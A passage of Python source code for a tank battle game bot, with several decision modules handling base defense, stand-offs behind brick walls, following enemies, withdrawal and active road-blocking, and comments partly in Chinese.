player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY #{ END 'decision/single/overlapping.py' }# #{ BEGIN 'decision/single/base_defense.py' }# class 
BaseDefenseDecision(SingleDecisionMaker):
    """
    Actively defend our base.
    -------------------------
    We have not met an enemy face to face yet, so first handle one special case:
    when an enemy is about to attack our base, moving to intercept takes priority
    over a predicted kill. This kind of defense may be suicidal in nature.

    If the enemy faces our base THIS turn
    -------------------------------------
    1. The enemy's shot is cooling down and it will fire at our base next turn;
       if our tank can intercept with its next move, move to intercept first.
    2. The enemy can shoot this turn and our tank can intercept with its next
       move: perform a suicidal interception.
    3. The enemy's shot is cooling down and it will fire at our base next turn,
       but our tank needs two moves to intercept: perform a suicidal interception.

    If the enemy can face our base NEXT turn
    ----------------------------------------
    1. The enemy will then certainly be able to shoot; if our tank can move to
       the intercepting position first during this turn, move with priority.

    """
    def _make_decision(self):

        player  = self._player
        map_    = player._map
        battler = player.battler

        for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]:
            if oppBattler.destroyed:
                continue
            #
            # The enemy faces our base this turn
            #
            if oppBattler.is_face_to_enemy_base():
                if oppBattler.canShoot: # the enemy can shoot this turn
                    for action in battler.get_all_valid_move_actions():
                        with map_.simulate_one_action(battler, action):
                            if not oppBattler.is_face_to_enemy_base(): # no longer facing our base -> correct route
                                player.set_status(Status.SACRIFICE_FOR_OUR_BASE)
                                return action
                else: # the enemy cannot shoot this turn
                    for action in battler.get_all_valid_move_actions(): # enemy cannot shoot, so we may try moving two steps
                        with map_.simulate_one_action(battler, action):
                            if not oppBattler.is_face_to_enemy_base(): # one-step block succeeded
                                player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE)
                                return action
                            else: # try a two-step interception (the same move twice)
                                if map_.is_valid_move_action(battler, action): # pre-check that the second step is legal
                                    with map_.simulate_one_action(battler, action):
                                        if not oppBattler.is_face_to_enemy_base(): # two-step interception succeeded
                                            player.set_status(Status.SACRIFICE_FOR_OUR_BASE)
                                            return action
            else:
                #
                # The enemy may face our base next turn
                #
                for enemyAction in oppBattler.get_all_valid_move_actions():
                    with map_.simulate_one_action(oppBattler, enemyAction):
                        if oppBattler.is_face_to_enemy_base(): # after one enemy move it faces our base
                            for action in battler.get_all_valid_move_actions():
                                with map_.simulate_one_action(battler, action):
                                    if not oppBattler.is_face_to_enemy_base(): # moving first can prevent it
                                        player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE)
                                        return action

#{ END 'decision/single/base_defense.py' }#



#{ BEGIN 'decision/single/behind_brick.py' }#

class BehindBrickDecision(RespondTeamSignalDecisionMaker):
    """
    Handles the stalemate situation in which we face an enemy from behind a brick wall.
    """
HANDLED_SIGNALS = ( Signal.PREPARE_FOR_BREAK_BRICK, Signal.READY_TO_BACK_AWAY_FROM_BRICK, ) def _make_decision(self): player = self._player signal = self._signal battler = player.battler BattleTank = type(battler) # 准备破墙信号 #-------------------------- # 触发条件: # # 1. 对应于双方对峙,我方开好后路后触发某些条件强制破墙 # 2. 对方刚刚从墙后移开,我方存在后路,这个时候强制破墙 # # 收到这个信号的时候,首先检查是否可以闪避 # # 1. 如果可以闪避,就返回可以破墙的信号 # 2. 如果不可以闪避,就返回这回合准备后路的信号 # if signal == Signal.PREPARE_FOR_BREAK_BRICK: attackAction = battler.get_next_attacking_action() # 只考虑攻击路径上的敌人 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) '''_undoRevertTurns = 0 while oppTank is None: # 对应于敌方刚离开的那种触发条件 # 可能存在多轮回滚,因为别人的策略和我们的不一样! # 给别人回滚的时候必须要考虑多回合! map_.revert() _undoRevertTurns += 1 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1)''' if oppTank is None: # # 墙后敌人并不一定处于攻击路径之后! 5ce3d1c0d2337e01c7a554e3 # 在这种情况下应该取消考虑这种情况 # res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.WAIT_FOR_MARCHING) # 用于下回合触发 player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # 用于下回合触发 player.set_risky_enemy(oppTank) # 重新设置这个敌人! dodgeActions = battler.try_dodge(oppTank) if len(dodgeActions) == 0: # 准备凿墙 breakBrickActions = battler.break_brick_for_dodge(oppTank) if len(breakBrickActions) == 0: # 两边均不是土墙 res = ( Action.STAY, Signal.CANHANDLED ) # 不能处理,只好等待 else: player.set_status(Status.READY_TO_PREPARE_FOR_BREAK_BRICK) res = ( breakBrickActions[0], Signal.READY_TO_PREPARE_FOR_BREAK_BRICK ) else: # 可以闪避,那么回复团队一条消息,下一步是破墙动作 shootAction = battler.shoot_to(oppTank) player.set_status(Status.READY_TO_BREAK_BRICK) res = ( shootAction, Signal.READY_TO_BREAK_BRICK ) '''for _ in range(_undoRevertTurns): map_.undo_revert()''' return res # 必定回复一个信号 # # 准备回退以制造二打一的局面 # if signal == Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK: attackAction = battler.get_next_attacking_action() # 只考虑攻击路径上的敌人 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) if oppTank is None: # ?? 
res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) action = battler.back_away_from(oppTank) realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_BACK_AWAY_FROM_BRICK) res = ( realAction, Signal.READY_TO_BACK_AWAY_FROM_BRICK ) else: # 存在风险,也就是想要夹击的敌人有炮弹,那么就先等待一回合 res = ( Action.STAY, Signal.CANHANDLED ) return res # 必定回复一个信号 #{ END 'decision/single/behind_brick.py' }# #{ BEGIN 'decision/single/follow_enemy_behind_brick.py' }# class FollowEnemyBehindBrickDecision(SingleDecisionMaker): """ 跟随墙后敌人的逻辑 ----------------- 如果上回合敌人和我方隔墙僵持,然后敌人向两侧移动,为了防止敌人从旁边的墙突破, 这里添加一个主动跟随的逻辑,假如对方这回合破墙,那么我方这回合就会出现在对方墙后, 这样对方就无法进攻,甚至可以为我方进攻创造机会 5ce57677d2337e01c7a7c1ff """ def _make_decision(self): player = self._player map_ = player._map battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if (player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and not Action.is_move(player.get_previous_action(back=1)) ): # 上回合墙后有人 with map_.rollback_to_previous(): action = battler.get_next_attacking_action() if Action.is_stay(action): return oppTank = battler.get_enemy_behind_brick(action, interval=-1) # 找到墙后敌人 if oppTank is None: # 理论上不会存在? return oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) dodgeActions = oppBattler.try_dodge(battler) previousAction = oppPlayer.get_previous_action(back=1) if Action.is_stay(previousAction): return if previousAction in dodgeActions: # 敌人上回合从墙后闪开 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合的移动行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): # 确保跟随后还隔着墙 5ce90a90d2337e01c7abcd07 # 否则何必要跟随 ... 
player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction # # 将动作连续化,如果对方连续移动,那么可以考虑跟随 # if player.has_status_in_previous_turns(Status.READY_TO_FOLLOW_ENEMY): oppTank = None with map_.auto_undo_revert() as counter: # 有可能要多回合回滚 while map_.revert(): counter.increase() action = battler.get_next_attacking_action() if Action.is_stay(action): continue oppTank = battler.get_enemy_behind_brick(action, interval=-1) if oppTank is not None: oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) break if oppTank is not None: # 理论上一定会找到敌人 previousAction = oppPlayer.get_previous_action(back=1) lastAction = player.get_previous_action(back=1) # 上回合一定跟随移动 # 确保敌人在贴着墙移动,否则就不必继续跟随了 if np.abs(previousAction % 4 - lastAction % 4) in (0, 2): # 两次移动方向或相反 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction #{ END 'decision/single/follow_enemy_behind_brick.py' }# #{ BEGIN 'decision/single/withdrawal.py' }# class WithdrawalDecision(SingleDecisionMaker): """ 主动回撤逻辑 ------------- 如果我方大逆风,那么主动回防基地 具有一个持久性的记忆标签 KEEP_ON_WITHDRAWING 带有这个标签的 player 在决策的时候,比 WithdrawalDecision 优先级高的决策应该以 WITHDRAW 状态为优先 带有 WITHDRAW 持久标记的 player 决策必定会在此处终止,否则就要取消这个标记和状态, 让后续的决策继续进行 """ ALLOW_WITHDRAWAL = True # 一个测试用的 const,设为 False 则取消一切和 WITHDRAW 相关的决策 @CachedProperty def _GUARD_POINTS(self): """ 获得基地两个对角线位置的两个防御坐标 """ player = self._player map_ = player._map tank = player.tank side = tank.side base = map_.bases[side] _DIAGONAL_DIRECTIONS = ( (1, 1), (1, -1), (-1, 1), (-1, -1) ) x1, y1 = base.xy points = [] for dx, dy in _DIAGONAL_DIRECTIONS: x2 = x1 + dx y2 = y1 + dy if map_.in_map(x2, y2): points.append( (x2, y2) ) return points def _get_more_dangerous_guard_point(self, oppBattler): """ 更加危险的防御点,被认为是距离敌人更近的防御点 """ player = self._player 
battler = player.battler _GUARD_POINTS = self._GUARD_POINTS distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in _GUARD_POINTS ] return _GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 def _is_dangerous_action(self, action, oppBattler): """ 为了防止出现这样一种情况: 5ce9154fd2337e01c7abd81f 以及这样一种情况: 5cea5d38d2337e01c7ad8418 ---------------------------------- 1. 假如我方这回合移动,而敌人下回合通过非射击行为,可以面向我方基地(射击行为的话,下回合对方炮弹冷却, 对基地暂时不造成威胁),如果我方这回合选择不移动可以阻止它,那么就选择停止 2. 假如我方这回合射击,而敌人下回合通过非射击行为,可以面向我方基地,那么就选择停止 3. 假如我方先破一墙,对方出现在后面,那么就算是有威胁 """ player = self._player battler = player.battler map_ = battler._map if (Action.is_move(action) and not oppBattler.is_face_to_enemy_base() # 事实上应该不会出现 ): # 先保存所有可能行为,为了防止模拟我方行为后,射击能力被重置 _shouldStay = False enemyAction = Action.STAY with map_.simulate_one_action(battler, action): for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(oppBattler, _action): if oppBattler.is_face_to_enemy_base(): # 我方执行一步后,对方面对基地 _shouldStay = True enemyAction = _action break if _shouldStay: # 现在不模拟我方行为,然后同样模拟对方行为,看对方是否面对我方基地 with map_.simulate_one_action(oppBattler, enemyAction): if not oppBattler.is_face_to_enemy_base(): return True if (Action.is_shoot(action) and not oppBattler.is_face_to_enemy_base() # 敌人上回合没有面对我方基地 ): for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(oppBattler, _action): if not oppBattler.is_face_to_enemy_base(): # 当敌人尚未面对我方基地 with map_.simulate_one_action(battler, action): if oppBattler.is_face_to_enemy_base(): # 我方射击一步后,敌人面对我方基地 return True # 不安全的 # 其他情况均认为安全 return False def _try_make_decision(self, action, oppBattler): """ Withdraw 下的 try_make_decision """ player = self._player Tank2Player = type(player) oppPlayer = Tank2Player(oppBattler) realAction = player.try_make_decision(action) if (Action.is_stay(realAction) and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=2) and 
player.has_status_in_previous_turns(Status.WAIT_FOR_WITHDRAWING, turns=2) and not Action.is_shoot(oppPlayer.get_previous_action(back=1)) and not Action.is_shoot(oppPlayer.get_previous_action(back=2)) ): # 如果等待了两回合,对方两回合均为射击那么视为安全 player.set_status(Status.FORCED_WITHDRAW) # 糟糕的设计!如果后续需要更改,那么需要在再删掉这个状态 realAction = action if (Action.is_stay(realAction) and not player.has_status(Status.FORCED_WITHDRAW) ): return Action.STAY if self._is_dangerous_action(realAction, oppBattler): player.remove_status(Status.FORCED_WITHDRAW) return Action.STAY return realAction def _get_next_action_to_guard_point(self, x2, y2, oppBattler): """ 获得趋近守卫点 (x2, y2) 的下一个行为 """ player = self._player battler = player.battler map_ = player._map base = map_.bases[battler.side] route = battler.get_route_to_point_by_move(x2, y2) assert not route.is_not_found() # 这个必定能找到路! action = battler.get_next_defensive_action(route) realAction = self._try_make_decision(action, oppBattler) if not Action.is_stay(realAction): with map_.simulate_one_action(battler, realAction): if not battler.is_closest_to(base): player.remove_status(Status.FORCED_WITHDRAW) return Action.STAY # 其实是可以确保一直停留在基地附近的? 
return realAction # stay/realAction def _make_decision(self): if not self.__class__.ALLOW_WITHDRAWAL: return self.__class__.UNHANDLED_RESULT player = self._player signal = self._signal map_ = player._map battler = player.battler base = map_.bases[battler.side] x2, y2 = base.xy Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=self.__class__.ALLOW_WITHDRAWAL) # # 首先,检查带有持久化 WITHDRAW 标签的 player # 该回合是否还需要真正的延续这个标签 # # 一种情况是考虑是否应该 # if (player.has_label(Label.KEEP_ON_WITHDRAWING) and status != Status.WITHDRAW # 实际评估不是 WITHDRAW ): strictStatus = evaluate_aggressive(battler, oppBattler, strict=True) if strictStatus == Status.AGGRESSIVE: # 假如对方上回合被击杀,那么我方大概率会触发侵略模式? player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.set_status(status) return # 留给其他 decision 处理 # # 一种情况是考虑上回合是否击杀了一个人 # if len([ _oppPlayer for _oppPlayer in player.opponents if _oppPlayer.defeated ]) == 1: teammate = player.teammate if not teammate.defeated: # 二打一的局势,此时 oppBattler 为剩下一个敌人 teammateBattler = teammate.battler _dontWithdraw = False _deltaDistanceToEnemy = battler.get_manhattan_distance_to(oppBattler) - teammateBattler.get_manhattan_distance_to(oppBattler) if _deltaDistanceToEnemy > 0: # 我比队友距离更远 _dontWithdraw = True elif _deltaDistanceToEnemy == 0: # 一样远 _deltaDistanceToOurBase = battler.get_manhattan_distance_to(base) - teammateBattler.get_manhattan_distance_to(base) if _deltaDistanceToOurBase > 0: # 我比队友理基地更远,那么让队友防御 _dontWithdraw = True elif _deltaDistanceToOurBase == 0: # 如果还是一样远 ... 
if not teammate.has_label(Label.DONT_WITHDRAW): # 避免两者同时强攻,那么就让先判断的队友进行强攻 _dontWithdraw = True if _dontWithdraw: player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.add_labels(Label.DONT_WITHDRAW) return # 留给其他 decision 处理 if status == Status.WITHDRAW or player.has_status(Status.WITHDRAW): player.remove_labels(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) player.add_labels(Label.KEEP_ON_WITHDRAWING) # 这个状态一旦出现,就添加标记 # # (inserted) 不要轻易从中线撤退,应该想一下是否可以堵路 # if battler.is_near_midline(offset=2): # y = [2, 6] for action in [ Action.STAY ] + battler.get_all_valid_move_actions(): # 先判断 stay with map_.simulate_one_action(battler, action): if battler.can_block_this_enemy(oppBattler): player.set_status(Status.READY_TO_BLOCK_ROAD) return action # 不需要判断安全性? # # 1. 如果上回合已经到达基地附近,那么优先移动到基地对角线的位置等待 # 2. 必要时改变守卫的位置 # # TODO: # 如果能直接到达守卫点,那应该考虑一下直接到达 ... 而不要先把基地的墙凿了 # if battler.is_closest_to(base): player.set_status(Status.GRARD_OUR_BASE) moreDangerousPoint = None _shouldMoveToDangerousPoint = False # # 已到达基地附近,但是未到达守卫点,尝试移向守卫点 # if (battler.xy not in self._GUARD_POINTS # 为处在对角线防御位置 and not player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE) # 高优先级触发 ): moreDangerousPoint = self._get_more_dangerous_guard_point(oppBattler) _shouldMoveToDangerousPoint = True # # 已经到达守卫点,判断是否需要移向另一个守卫点 # if battler.xy in self._GUARD_POINTS: distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in self._GUARD_POINTS ] moreDangerousPoint = self._GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 _shouldMoveToDangerousPoint = True if _shouldMoveToDangerousPoint: action = self._get_next_action_to_guard_point(*moreDangerousPoint, oppBattler) if not Action.is_stay(action): player.set_status(Status.MOVE_TO_ANOTHER_GUARD_POINT) else: player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) return action player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) # 设置为等待 return Action.STAY # 
其他情况下继续等待 _route1 = battler.get_shortest_defensive_route() _route2 = oppBattler.get_shortest_attacking_route() # 如果不将我视为钢墙 _route3 = oppBattler.get_shortest_attacking_route( ignore_enemies=False, bypass_enemies=True) # 如果将我视为钢墙 # TODO: # 如果 route2 和 route3 距离差很大,那么可以选择不动 # if _route2.is_not_found() or _route3.is_not_found(): # 对方找不到进攻路线,那就相当于我方把路堵住了? return Action.STAY assert not _route1.is_not_found() # 这个不可能的吧 allowedDelay = _route2.length - (_route1.length - 2) # 我方防御路线比地方进攻路线领先值 allowedDelay -= 1 # 至少要快一步 if allowedDelay < 0: allowedDelay = 0 returnAction = Action.INVALID with outer_label() as OUTER_BREAK: for route in sorted( battler.get_all_shortest_defensive_routes(delay=allowedDelay), key=lambda route: estimate_route_blocking(route) ): # 阻塞程度最小的优先 action = battler.get_next_defensive_action(route) if Action.is_stay(action) and battler.is_closest_to(base): # 到达基地就等待了 returnAction = action raise OUTER_BREAK realAction = self._try_make_decision(action, oppBattler) if Action.is_stay(realAction): # 尽量找一条不是停留的路? player.remove_status(Status.FORCED_WITHDRAW) continue returnAction = realAction raise OUTER_BREAK if not Action.is_valid(returnAction): # 没有一个合适的行为? action = battler.get_next_defensive_action(_route1) # 那就随便来一个把 ... returnAction = self._try_make_decision(action, oppBattler) if Action.is_move(returnAction) or Action.is_shoot(returnAction): player.set_status(Status.READY_TO_WITHDRAW) else: # stay if battler.is_closest_to(base): player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) else: if player.get_risky_enemy() is not None: # 存在风险敌人就能判定是因为敌人阻挡? player.set_status(Status.WAIT_FOR_WITHDRAWING) player.set_status(Status.PREVENT_BEING_KILLED) return returnAction #{ END 'decision/single/withdrawal.py' }# #{ BEGIN 'decision/single/active_defense.py' }# class ActiveDefenseDecision(SingleDecisionMaker): """ 主动防御策略 ----------------------- 不要追击敌人,而是选择保守堵路策略! 1. 对于路线差为 2 的情况,选择堵路,而非重叠 2. 
如果自己正常行军将会射击,那么判断射击所摧毁的块是否为敌人进攻路线上的块 如果是,则改为移动或者停止 """ ACTIVE_DEFENSE_MIN_TRIGGER_TURNS = 2 # 前两回合结束前不要触发主动防御! def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() # 从路线距离分析确定最近敌人 oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) if status == Status.DEFENSIVE: # 避免过早进入 DEFENSIVE 状态 #---------------------------- currentTurn = map_.turn if currentTurn < __class__.ACTIVE_DEFENSE_MIN_TRIGGER_TURNS and False: # 取消主动防御轮数限制? player.remove_status(Status.DEFENSIVE) player.set_status(Status.AGGRESSIVE) # 前期以侵略性为主 else: # 如果是距离为 2 #---------------- # 由于两者相对的情况在前面的 encount enemy 时会被处理,这里如果遇到这种情况 # 那么说明两者是出于不相对的对角线位置。 # _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! 
assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: # # 此时应该考虑自己是否正处在敌方的进攻的必经之路上 # 如果是这样,那么考虑不动,这样最保守 # 否则在合适的回合冲上去挡路 # # 判定方法是将己方坦克分别视为空白和钢墙,看对方的最短路线长度是否有明显延长 # 如果有,那么就堵路 # # 需要能够正确应对这一局的情况 5cd356e5a51e681f0e921453 # TODO: # 事实上这一局敌方不管往左还是往右,都是8步,因此这里会判定为不堵路,所以就会主动重叠 # 但是,左右两边的走法是不一样的,往左走必定会走不通,左右的8步并不等价,这里需要还需要 # 进一步的分析路线的可走性 # # TODO: # 事实上这样不一定准确,因为如果敌人前面有一个土墙,那么他可以先打掉土墙 # 然后继续前移,这样敌方就可以选择继续往前移动 # enemyAttackRoute1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) enemyAttackRoute2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if enemyAttackRoute2.length > enemyAttackRoute1.length: # 路线增长,说明是必经之路 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 虽然路线长度相同,但是路线的可走性不一定相同,这里先衡量对方当前路线的可走性 # 如果本回合我方等待,敌人向前移动,那么敌方只有在能够不向原来位置闪避的情况下 # 才算是我堵不住他的路,否则仍然视为堵路成功 5cd356e5a51e681f0e921453 # x0, y0 = oppBattler.xy # 保存原始坐标 enemyMoveAction = oppBattler.get_next_attacking_action(enemyAttackRoute1) # ssert Action.is_move(enemyMoveAction) # 应该是移动 _shouldStay = False with map_.simulate_one_action(oppBattler, enemyMoveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 此时敌方与我相邻 _shouldStay = True # 这种情况才是真正的设为 True 否则不属于此处应当考虑的情况 for enemyDodgeAction in oppBattler.try_dodge(battler): with map_.simulate_one_action(oppBattler, enemyDodgeAction): if oppBattler.xy != (x0, y0): # 如果敌人移动后可以不向着原来的位置闪避 _shouldStay = False # 此时相当于不能堵路 break if _shouldStay: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 否则自己不处在敌方的必经之路上,考虑主动堵路 # if (not oppBattler.canShoot # 对方这回合不能射击 or (Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=2)) ) # 或者对方等待了两个回合,视为没有危险 ): # 不宜只考虑一回合,否则可能会出现这种预判错误的情况 5cdd894dd2337e01c79e9bed for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, 
moveAction): if battler.xy in enemyAttackRoute1: # 移动后我方坦克位于敌方坦克进攻路线上 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 我方的移动后仍然不会挡敌人的路?? for moveAction in battler.get_all_valid_move_actions(middle_first=True): # 中路优先 with map_.simulate_one_action(battler, moveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 如果移动后与敌人相邻 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 否则,就是和敌人接近的连个方向上均为不可走的! # 那么让后续的逻辑进行处理 pass ''' if ( # 可能是主动防御但是为了防止重叠而等待 ( player.has_status_in_previous_turns(Status.ACTIVE_DEFENSIVE, turns=1) and player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) and Action.is_stay(player.get_previous_action(back=1)) ) or # 可能是为了防止被杀而停止 ( player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED) and Action.is_stay(player.get_previous_action(back=1)) ) ): oppPlayer = Tank2Player(oppBattler) if Action.is_stay(oppPlayer.get_previous_action(back=1)): # 对方上回合在等待 # # 但是遇到这种情况就非常尴尬 5cd356e5a51e681f0e921453 # # 需要再判断一下是否有必要上前堵路 # _shouldMove = False x1, y1 = oppBattler.xy x2, y2 = _route[1].xy # 目标位置 enemyAttackRoute = oppBattler.get_shortest_attacking_route() if (x2, y2) in enemyAttackRoute: # 下一步移动为进攻路线 enemyMoveAction = Action.get_move_action(x1, y1, x2, y2) with map_.simulate_one_action(oppBattler, enemyMoveAction): for enemyDodgeAction in oppBattler.try_dodge(battler): # 如果敌人上前后可以闪避我 route1 = oppBattler.get_shortest_attacking_route() with map_.simulate_one_action(oppBattler, enemyDodgeAction): route2 = oppBattler.get_shortest_attacking_route() if route2.length <= route1.length: # 并且闪避的路线不是原路返回 _shouldMove = True break # # 真正的值得堵路的情况 # if _shouldMove: x1, y1 = battler.xy x2, y2 = _route[1].xy # 跳过开头 moveAction = Action.get_move_action(x1, y1, x2, y2) if map_.is_valid_move_action(battler, moveAction): # 稍微检查一下,应该本来是不会有错的 player.set_status(Status.ACTIVE_DEFENSIVE) 
player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction # # 否则选择不要上前和敌人重叠,而是堵路 # player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY''' # endif # 转向寻找和敌方进攻路线相似度更高的路线 #-------------------------------------- # enemyAttackRoute = oppBattler.get_shortest_attacking_route() closestAttackRoute = max( battler.get_all_shortest_attacking_routes(delay=3), # 允许 3 步延迟 key=lambda r: estimate_route_similarity(r, enemyAttackRoute) ) # 相似度最大的路线 # # 判断下一步是否可以出现在敌人的攻击路径之上 5cd31d84a51e681f0e91ca2c #------------------------------- # 如果可以,就移动过去 # for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, moveAction): x3, y3 = battler.xy # 获得移动后的坐标 if (x3, y3) in enemyAttackRoute: _willMove = False # 是否符合移动的条件 realAction = player.try_make_decision(moveAction) if Action.is_move(realAction): _willMove = True elif player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 打破僵局 oppBattler = player.get_risky_enemy() oppPlayer = Tank2Player(oppBattler) if (oppBattler.canShoot # 当回合可以射击 and not oppPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 ): # 说明敌人大概率不打算攻击我 _willMove = True # # 符合了移动的条件 # 但是还需要检查移动方向 # 不能向着远离敌人的方向移动,不然就会后退 ... 
5cd33351a51e681f0e91da39 # if _willMove: distance1 = battler.get_manhattan_distance_to(oppBattler) with map_.simulate_one_action(battler, moveAction): distance2 = battler.get_manhattan_distance_to(oppBattler) if distance2 > distance1: # 向着远处移动了 pass else: # 添加一个限制,必须要移动后出现在敌人的附近 # 否则约束过弱,容易导致前期乱跑的情况 5cd39434a51e681f0e924128 # for enemy in oppBattler.get_enemies_around(): if enemy is tank: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction attackAction = battler.get_next_attacking_action(closestAttackRoute) realAction = player.try_make_decision(attackAction) # # 判断自己的下一步是否为敌人开路 #------------------------- # 如果自己下一个行为是射击,然后所射掉的块为敌人进攻路线上的块 # 那么将这个动作转为移动或者停止 # # TODO: # 这个动作是有条件的,通常认为是,块就处在敌人的周围,我将块打破后 # 敌人有炮,我不能马上移到块的,这样就可能让敌人过掉,在这种情况下避免开炮 # # TODO: # 不能被过掉的情况不准确!只有不再在同一直线的情况下才需要判断 5ce444a8d2337e01c7a5eaea # 如果两者处在同一条直线,假如双方都射击,那么下一回合就直接相遇,并不会出现被对方过掉的情况 # if (not battler.on_the_same_line_with(oppBattler) and Action.is_shoot(realAction) and battler.will_destroy_a_brick_if_shoot(realAction) # 下一步将会打掉一个墙 ): field = battler.get_destroyed_fields_if_shoot(realAction)[0] enemyAttackRoute = oppBattler.get_shortest_attacking_route() if enemyAttackRoute.has_block(field): # 打掉的 Brick 在敌人进攻路线上 # # 再尝试模拟,是否会导致上述情况 # _dontShoot = False with outer_label() as OUTER_BREAK: for enemyMoveAction in oppBattler.get_all_valid_actions(): # 一回合假设我方射击,敌人任意行为 with map_.simulate_multi_actions((battler, realAction), (oppBattler, enemyMoveAction)): moveAction = realAction - 4 # 二回合假设我方移动,敌人射击 for enemyShootAction in oppBattler.get_all_valid_shoot_actions(): # 自动判断是否可射击 with map_.simulate_multi_actions((battler, moveAction), (oppBattler, enemyShootAction)): if battler.destroyed: # 然后这回合我方坦克挂了 _dontShoot = True raise OUTER_BREAK if _dontShoot: player.set_status(Status.ACTIVE_DEFENSIVE) return player.try_make_decision(moveAction) # 移动/停止 # 否则直接采用主动防御的进攻策略 # # TODO: # 这是个糟糕的设计,因为这相当于要和下方的进攻代码重复一遍 # if battler.is_in_our_site(): # 只有在我方地盘的时候才触发 # # 
首先实现禁止随便破墙 # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY # # 敌人下一步可能移到墙后面 # for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): if battler.get_enemy_behind_brick(realAction, interval=-1) is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY if Action.is_stay(realAction): # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 这段代码复制自下方的侵略模式 #-------------------------- if Action.is_move(attackAction): if player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 即将停留第二回合 oppPlayer = Tank2Player(oppBattler) if 